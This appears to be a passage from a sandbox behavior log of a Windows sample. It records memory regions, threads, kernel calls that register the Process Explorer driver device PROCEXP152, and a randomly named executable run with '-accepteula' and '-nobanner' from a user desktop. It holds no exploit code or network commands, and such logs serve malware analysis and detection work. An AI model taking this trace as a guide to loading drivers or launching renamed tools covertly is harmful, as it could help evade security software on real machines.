0x0 region_type = private name = "private_0x0000000280170000" filename = "" Region: id = 2102 start_va = 0x280190000 end_va = 0x2801affff entry_point = 0x0 region_type = private name = "private_0x0000000280190000" filename = "" Region: id = 2103 start_va = 0x2801b0000 end_va = 0x2801cffff entry_point = 0x0 region_type = private name = "private_0x00000002801b0000" filename = "" Region: id = 2104 start_va = 0x2801d0000 end_va = 0x2801effff entry_point = 0x0 region_type = private name = "private_0x00000002801d0000" filename = "" Region: id = 2105 start_va = 0x2801f0000 end_va = 0x28020ffff entry_point = 0x0 region_type = private name = "private_0x00000002801f0000" filename = "" Region: id = 2106 start_va = 0x280210000 end_va = 0x28022ffff entry_point = 0x0 region_type = private name = "private_0x0000000280210000" filename = "" Region: id = 2107 start_va = 0x280230000 end_va = 0x28024ffff entry_point = 0x0 region_type = private name = "private_0x0000000280230000" filename = "" Region: id = 2108 start_va = 0x280250000 end_va = 0x28026ffff entry_point = 0x0 region_type = private name = "private_0x0000000280250000" filename = "" Region: id = 2109 start_va = 0x280270000 end_va = 0x28028ffff entry_point = 0x0 region_type = private name = "private_0x0000000280270000" filename = "" Region: id = 2110 start_va = 0x280290000 end_va = 0x2802affff entry_point = 0x0 region_type = private name = "private_0x0000000280290000" filename = "" Region: id = 2111 start_va = 0x2802b0000 end_va = 0x2802cffff entry_point = 0x0 region_type = private name = "private_0x00000002802b0000" filename = "" Region: id = 2112 start_va = 0x2802d0000 end_va = 0x2802effff entry_point = 0x0 region_type = private name = "private_0x00000002802d0000" filename = "" Region: id = 2113 start_va = 0x2802f0000 end_va = 0x28030ffff entry_point = 0x0 region_type = private name = "private_0x00000002802f0000" filename = "" Region: id = 2114 start_va = 0x280310000 end_va = 0x28032ffff entry_point = 0x0 region_type = private name = "private_0x0000000280310000" filename = "" Region: id = 2115 start_va = 0x280330000 end_va = 0x28034ffff entry_point = 0x0 region_type = private name = "private_0x0000000280330000" filename = "" Region: id = 2116 start_va = 0x280350000 end_va = 0x28036ffff entry_point = 0x0 region_type = private name = "private_0x0000000280350000" filename = "" Region: id = 2117 start_va = 0x280370000 end_va = 0x28038ffff entry_point = 0x0 region_type = private name = "private_0x0000000280370000" filename = "" Region: id = 2118 start_va = 0x280390000 end_va = 0x2803affff entry_point = 0x0 region_type = private name = "private_0x0000000280390000" filename = "" Region: id = 2119 start_va = 0x2803b0000 end_va = 0x2803cffff entry_point = 0x0 region_type = private name = "private_0x00000002803b0000" filename = "" Region: id = 2120 start_va = 0x2803d0000 end_va = 0x2803effff entry_point = 0x0 region_type = private name = "private_0x00000002803d0000" filename = "" Region: id = 2121 start_va = 0x2803f0000 end_va = 0x28040ffff entry_point = 0x0 region_type = private name = "private_0x00000002803f0000" filename = "" Region: id = 2122 start_va = 0x280410000 end_va = 0x28042ffff entry_point = 0x0 region_type = private name = "private_0x0000000280410000" filename = "" Region: id = 2123 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 166 os_tid = 0x2c Thread: id = 167 os_tid = 0x13c Thread: id = 168 os_tid = 0xf68 Thread: id = 169 os_tid = 0xf34 Thread: id = 170 os_tid = 0xf30 Thread: id = 171 os_tid = 0xdac Thread: id = 172 os_tid = 0xeb8 Thread: id = 173 os_tid = 0xeac Thread: id = 174 os_tid = 0x28 Thread: id = 175 os_tid = 0x138 Thread: id = 176 os_tid = 0xdc8 Thread: id = 177 os_tid = 0xda8 Thread: id = 178 os_tid = 0xda4 Thread: id = 179 os_tid = 0xda0 Thread: id = 180 os_tid = 0xd9c Thread: id = 181 os_tid = 0xd98 Thread: id = 182 os_tid = 0xd94 Thread: id = 183 os_tid = 0xd90 Thread: id = 184 os_tid = 0xd8c Thread: id = 185 os_tid = 0xd88 Thread: id = 186 os_tid = 0xd84 Thread: id = 187 os_tid = 0xd80 Thread: id = 188 os_tid = 0xd7c Thread: id = 189 os_tid = 0xd78 Thread: id = 190 os_tid = 0xd74 Thread: id = 191 os_tid = 0xd70 Thread: id = 192 os_tid = 0xd6c Thread: id = 193 os_tid = 0xd68 Thread: id = 194 os_tid = 0xd64 Thread: id = 195 os_tid = 0xd60 Thread: id = 196 os_tid = 0xd5c Thread: id = 197 os_tid = 0xd58 Thread: id = 198 os_tid = 0xd54 Thread: id = 199 os_tid = 0xd50 Thread: id = 200 os_tid = 0xd4c Thread: id = 201 os_tid = 0xd48 Thread: id = 202 os_tid = 0xd44 Thread: id = 203 os_tid = 0xd40 Thread: id = 204 os_tid = 0xd3c Thread: id = 205 os_tid = 0xd38 Thread: id = 206 os_tid = 0xd34 Thread: id = 207 os_tid = 0xd30 Thread: id = 208 os_tid = 0xd2c Thread: id = 209 os_tid = 0xd28 Thread: id = 210 os_tid = 0xd24 Thread: id = 211 os_tid = 0xd20 Thread: id = 212 os_tid = 0xd1c Thread: id = 213 os_tid = 0xd10 Thread: id = 214 os_tid = 0xd04 Thread: id = 215 os_tid = 0xcec Thread: id = 216 os_tid = 0xcd0 Thread: id = 217 os_tid = 0xc98 Thread: id = 218 os_tid = 0xca4 Thread: id = 219 os_tid = 0x1c Thread: id = 220 os_tid = 0xc80 Thread: id = 221 os_tid = 0xc70 Thread: id = 222 os_tid = 0xc5c Thread: id = 223 os_tid = 0xd0 Thread: id = 224 os_tid = 0xcc Thread: id = 225 os_tid = 0x914 Thread: id = 226 os_tid = 0xe8 Thread: id = 227 os_tid = 0x7f0 Thread: id = 228 os_tid = 0x84 Thread: id = 229 os_tid = 0x80 Thread: id = 230 os_tid = 0x30 Thread: id = 231 os_tid = 0xb34 Thread: id = 232 os_tid = 0x85c Thread: id = 233 os_tid = 0x8b8 Thread: id = 234 os_tid = 0xbe0 Thread: id = 235 os_tid = 0x884 Thread: id = 236 os_tid = 0xbe8 Thread: id = 237 os_tid = 0x510 Thread: id = 238 os_tid = 0x850 Thread: id = 239 os_tid = 0x860 Thread: id = 240 os_tid = 0x4cc Thread: id = 241 os_tid = 0xb44 Thread: id = 242 os_tid = 0x2d0 Thread: id = 243 os_tid = 0xbf4 Thread: id = 244 os_tid = 0xa18 Thread: id = 245 os_tid = 0xa0c Thread: id = 246 os_tid = 0x9ac Thread: id = 247 os_tid = 0x9a0 Thread: id = 248 os_tid = 0x10 Thread: id = 249 os_tid = 0x8c4 Thread: id = 250 os_tid = 0x8bc Thread: id = 251 os_tid = 0x38 Thread: id = 252 os_tid = 0x858 Thread: id = 253 os_tid = 0x6c Thread: id = 254 os_tid = 0x730 Thread: id = 255 os_tid = 0xc8 Thread: id = 256 os_tid = 0x670 Thread: id = 257 os_tid = 0x66c Thread: id = 258 os_tid = 0x660 Thread: id = 259 os_tid = 0x654 Thread: id = 260 os_tid = 0xc4 [0222.269] RtlInitUnicodeString (in: DestinationString=0xffffd000abd4f640, SourceString="PsAcquireProcessExitSynchronization" | out: DestinationString="PsAcquireProcessExitSynchronization") [0222.269] MmGetSystemRoutineAddress (SystemRoutineName="PsAcquireProcessExitSynchronization") returned 0xfffff803f3d90204 [0222.269] RtlInitUnicodeString (in: DestinationString=0xffffd000abd4f640, SourceString="PsReleaseProcessExitSynchronization" | out: DestinationString="PsReleaseProcessExitSynchronization") [0222.269] MmGetSystemRoutineAddress (SystemRoutineName="PsReleaseProcessExitSynchronization") returned 0xfffff803f3d94ce0 [0222.269] RtlInitUnicodeString (in: DestinationString=0xffffd000abd4f640, SourceString="ObGetObjectType" | out: DestinationString="ObGetObjectType") [0222.269] MmGetSystemRoutineAddress (SystemRoutineName="ObGetObjectType") returned 0xfffff803f3da7ae8 [0222.269] ObGetObjectType () returned 0xffffe00067e6e2b0 [0222.269] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x26, Tag=0x544f4550) returned 0xffffc00147f64a50 [0222.269] ObOpenObjectByName (in: ObjectAttributes=0xffffd000abd4f5a0, ObjectType=0xffffe00067e6e2b0, AccessMode=0x0, PassedAccessState=0x0, DesiredAccess=0xffffd000000f0001, ParseContext=0x0, Handle=0xffffd000abd4f5f8 | out: ParseContext=0x0, Handle=0xffffd000abd4f5f8*=0xffffffff80001248) returned 0x0 [0222.269] ExFreePoolWithTag (P=0xffffc00147f64a50, Tag=0x0) [0222.269] ObReferenceObjectByHandle (in: Handle=0xffffffff80001248, DesiredAccess=0xf0001, ObjectType=0xffffe00067e6e2b0, AccessMode=0x0, Object=0xffffd000abd4f600, HandleInformation=0x0 | out: Object=0xffffd000abd4f600*=0xffffe00067e85f20, HandleInformation=0x0) returned 0x0 [0222.269] ZwClose (Handle=0xffffffff80001248) returned 0x0 [0222.269] ObfDereferenceObject (Object=0xffffe00067e85f20) returned 0x2 [0222.269] RtlInitUnicodeString (in: DestinationString=0xffffd000abd4f658, SourceString="\\Device\\PROCEXP152" | out: DestinationString="\\Device\\PROCEXP152") [0222.269] RtlInitUnicodeString (in: DestinationString=0xffffd000abd4f678, SourceString="D:P(A;;GA;;;SY)(A;;GA;;;BA)" | out: DestinationString="D:P(A;;GA;;;SY)(A;;GA;;;BA)") [0222.269] RtlInitUnicodeString (in: DestinationString=0xffffd000abd4f570, SourceString="IoCreateDeviceSecure" | out: DestinationString="IoCreateDeviceSecure") [0222.269] MmGetSystemRoutineAddress (SystemRoutineName="IoCreateDeviceSecure") returned 0x0 [0222.269] RtlInitUnicodeString (in: DestinationString=0xffffd000abd4f570, SourceString="IoValidateDeviceIoControlAccess" | out: DestinationString="IoValidateDeviceIoControlAccess") [0222.269] MmGetSystemRoutineAddress (SystemRoutineName="IoValidateDeviceIoControlAccess") returned 0xfffff803f397f874 [0222.269] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x68, Tag=0x6c416553) returned 0xffffc0014a4c5650 [0222.269] _wcsnicmp (_String1="A", _String2="A", _MaxCount=0x1) returned 0 [0222.269] _wcsnicmp (_String1="GA", _String2="RC", _MaxCount=0x2) returned -11 [0222.269] _wcsnicmp (_String1="GA", _String2="WD", _MaxCount=0x2) returned -16 [0222.269] _wcsnicmp (_String1="GA", _String2="WO", _MaxCount=0x2) returned -16 [0222.270] _wcsnicmp (_String1="GA", _String2="SD", _MaxCount=0x2) returned -12 [0222.270] _wcsnicmp (_String1="GA", _String2="GA", _MaxCount=0x2) returned 0 [0222.270] _wcsnicmp (_String1="SY", _String2="WD", _MaxCount=0x2) returned -4 [0222.270] _wcsnicmp (_String1="SY", _String2="BA", _MaxCount=0x2) returned 17 [0222.270] _wcsnicmp (_String1="SY", _String2="SY", _MaxCount=0x2) returned 0 [0222.270] RtlLengthSid (Sid=0xffffe00067e760b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc [0222.270] RtlAddAccessAllowedAce (in: Acl=0xffffc0014a4c5650, AceRevision=0x2, AccessMask=0x10000000, Sid=0xffffe00067e760b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: Acl=0xffffc0014a4c5650) returned 0x0 [0222.270] _wcsnicmp (_String1="A", _String2="A", _MaxCount=0x1) returned 0 [0222.270] _wcsnicmp (_String1="GA", _String2="RC", _MaxCount=0x2) returned -11 [0222.270] _wcsnicmp (_String1="GA", _String2="WD", _MaxCount=0x2) returned -16 [0222.270] _wcsnicmp (_String1="GA", _String2="WO", _MaxCount=0x2) returned -16 [0222.270] _wcsnicmp (_String1="GA", _String2="SD", _MaxCount=0x2) returned -12 [0222.270] _wcsnicmp (_String1="GA", _String2="GA", _MaxCount=0x2) returned 0 [0222.270] _wcsnicmp (_String1="BA", _String2="WD", _MaxCount=0x2) returned -21 [0222.270] _wcsnicmp (_String1="BA", _String2="BA", _MaxCount=0x2) returned 0 [0222.270] RtlLengthSid (Sid=0xffffc00147800390*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 0x10 [0222.270] RtlAddAccessAllowedAce (in: Acl=0xffffc0014a4c5650, AceRevision=0x2, AccessMask=0x10000000, Sid=0xffffc00147800390*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: Acl=0xffffc0014a4c5650) returned 0x0 [0222.270] RtlCreateSecurityDescriptor (in: SecurityDescriptor=0xffffd000abd4f488, Revision=0x1 | out: SecurityDescriptor=0xffffd000abd4f488) returned 0x0 [0222.270] RtlSetDaclSecurityDescriptor (in: SecurityDescriptor=0xffffd000abd4f488, DaclPresent=1, Dacl=0xffffc0014a4c5650, DaclDefaulted=0 | out: SecurityDescriptor=0xffffd000abd4f488) returned 0x0 [0222.270] RtlAbsoluteToSelfRelativeSD (in: AbsoluteSecurityDescriptor=0xffffd000abd4f488, SelfRelativeSecurityDescriptor=0x0, BufferLength=0xffffd000abd4f4d0 | out: SelfRelativeSecurityDescriptor=0x0, BufferLength=0xffffd000abd4f4d0) returned 0xc0000023 [0222.270] ExAllocatePoolWithTag (PoolType=0x1, NumberOfBytes=0x48, Tag=0x64536553) returned 0xffffc0014a4faac0 [0222.270] RtlAbsoluteToSelfRelativeSD (in: AbsoluteSecurityDescriptor=0xffffd000abd4f488, SelfRelativeSecurityDescriptor=0xffffc0014a4faac0, BufferLength=0xffffd000abd4f4d0 | out: SelfRelativeSecurityDescriptor=0xffffc0014a4faac0, BufferLength=0xffffd000abd4f4d0) returned 0x0 [0222.270] ExFreePoolWithTag (P=0xffffc0014a4c5650, Tag=0x0) [0222.270] IoCreateDevice (in: DriverObject=0xffffe0006a4e8740, DeviceExtensionSize=0x0, DeviceName="\\Device\\PROCEXP152", DeviceType=0x8335, DeviceCharacteristics=0x0, Exclusive=0, DeviceObject=0xffffd000abd4f5d0 | out: DeviceObject=0xffffd000abd4f5d0) returned 0x0 [0222.270] RtlGetOwnerSecurityDescriptor (in: SecurityDescriptor=0xffffc0014a4faac0, Owner=0xffffd000abd4f460, OwnerDefaulted=0xffffd000abd4f498 | out: Owner=0xffffd000abd4f460*=0x0, OwnerDefaulted=0xffffd000abd4f498) returned 0x0 [0222.270] RtlGetGroupSecurityDescriptor (in: SecurityDescriptor=0xffffc0014a4faac0, Group=0xffffd000abd4f460, GroupDefaulted=0xffffd000abd4f498 | out: Group=0xffffd000abd4f460*=0x0, GroupDefaulted=0xffffd000abd4f498) returned 0x0 [0222.270] RtlGetSaclSecurityDescriptor (in: SecurityDescriptor=0xffffc0014a4faac0, SaclPresent=0xffffd000abd4f4a8, Sacl=0xffffd000abd4f468, SaclDefaulted=0xffffd000abd4f498 | out: SaclPresent=0xffffd000abd4f4a8, Sacl=0xffffd000abd4f468, SaclDefaulted=0xffffd000abd4f498) returned 0x0 [0222.270] RtlGetDaclSecurityDescriptor (in: SecurityDescriptor=0xffffc0014a4faac0, DaclPresent=0xffffd000abd4f4a8, Dacl=0xffffd000abd4f468, DaclDefaulted=0xffffd000abd4f498 | out: DaclPresent=0xffffd000abd4f4a8, Dacl=0xffffd000abd4f468, DaclDefaulted=0xffffd000abd4f498) returned 0x0 [0222.270] ObOpenObjectByPointer (in: Object=0xffffe0006a372e40, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x40000, ObjectType=0xffffe00067ea1f20, AccessMode=0xffffe0006a4e8700, Handle=0xffffd000abd4f4d0 | out: Handle=0xffffd000abd4f4d0*=0xffffffff80001248) returned 0x0 [0222.270] ZwSetSecurityObject (Handle=0xffffffff80001248, SecurityInformation=0x4, SecurityDescriptor=0xffffc0014a4faac0) returned 0x0 [0222.270] ZwClose (Handle=0xffffffff80001248) returned 0x0 [0222.270] ExFreePoolWithTag (P=0xffffc0014a4faac0, Tag=0x0) [0222.270] RtlInitUnicodeString (in: DestinationString=0xffffd000abd4f668, SourceString="\\DosDevices\\PROCEXP152" | out: DestinationString="\\DosDevices\\PROCEXP152") [0222.270] IoCreateSymbolicLink (SymbolicLinkName="\\DosDevices\\PROCEXP152", DeviceName="\\Device\\PROCEXP152") returned 0x0 Thread: id = 261 os_tid = 0x5c8 Thread: id = 262 os_tid = 0x560 Thread: id = 263 os_tid = 0x48 Thread: id = 264 os_tid = 0x518 Thread: id = 265 os_tid = 0x178 Thread: id = 266 os_tid = 0x50c Thread: id = 267 os_tid = 0x4b4 Thread: id = 268 os_tid = 0x474 Thread: id = 269 os_tid = 0x460 Thread: id = 270 os_tid = 0x8c Thread: id = 271 os_tid = 0x1e0 Thread: id = 272 os_tid = 0x70 Thread: id = 273 os_tid = 0x33c Thread: id = 274 os_tid = 0x74 Thread: id = 275 os_tid = 0xb0 Thread: id = 276 os_tid = 0x144 Thread: id = 277 os_tid = 0x78 Thread: id = 278 os_tid = 0x174 Thread: id = 279 os_tid = 0x2c4 Thread: id = 280 os_tid = 0x84 Thread: id = 281 os_tid = 0x44 Thread: id = 282 os_tid = 0x148 Thread: id = 283 os_tid = 0x14 Thread: id = 284 os_tid = 0xb8 Thread: id = 285 os_tid = 0x104 Thread: id = 286 os_tid = 0x1b0 Thread: id = 287 os_tid = 0x20 Thread: id = 288 os_tid = 0x3c Thread: id = 289 os_tid = 0x17c Thread: id = 290 os_tid = 0x170 Thread: id = 291 os_tid = 0x16c Thread: id = 292 os_tid = 0x164 Thread: id = 293 os_tid = 0xe4 Thread: id = 294 os_tid = 0x140 Thread: id = 295 os_tid = 0x7c Thread: id = 296 os_tid = 0x34 Thread: id = 297 os_tid = 0xf0 Thread: id = 298 os_tid = 0xa4 Thread: id = 299 os_tid = 0xb4 Thread: id = 300 os_tid = 0xa8 Thread: id = 301 os_tid = 0x128 Thread: id = 302 os_tid = 0x124 Thread: id = 303 os_tid = 0xc0 Thread: id = 304 os_tid = 0x60 Thread: id = 305 os_tid = 0x88 Thread: id = 306 os_tid = 0x110 Thread: id = 307 os_tid = 0xbc Thread: id = 308 os_tid = 0xec Thread: id = 309 os_tid = 0x64 Thread: id = 310 os_tid = 0x8 Thread: id = 311 os_tid = 0x0 Thread: id = 313 os_tid = 0xa10 Thread: id = 792 os_tid = 0x5c Process: id = "32" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x2101d000" os_pid = "0xed4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "30" os_parent_pid = "0x190" cmd_line = "vIDhS3md.exe -accepteula \"jnwdui.dll.mui\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2126 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2127 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2128 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2129 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2130 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2131 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2132 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2133 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2134 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 2135 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2136 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2137 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 2138 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2139 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2140 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2141 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2142 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2143 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 6275 start_va = 0x220000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 6276 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 6277 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 6278 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6279 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 6280 start_va = 0x480000 end_va = 0x70ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 6281 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 6282 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 6283 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 6284 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 6285 start_va = 0x230000 end_va = 0x2edfff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 6286 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 6287 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 6288 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 6289 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 6290 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 6291 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 6292 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 6293 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 6294 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 6295 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 6296 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 6297 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 6298 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 6299 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 6300 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 6301 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 6302 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 6303 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 6304 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 6305 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 6306 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 6307 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 6308 start_va = 0x74380000 end_va = 0x74411fff entry_point = 0x74380000 region_type = mapped_file name = "comctl32.dll" filename = 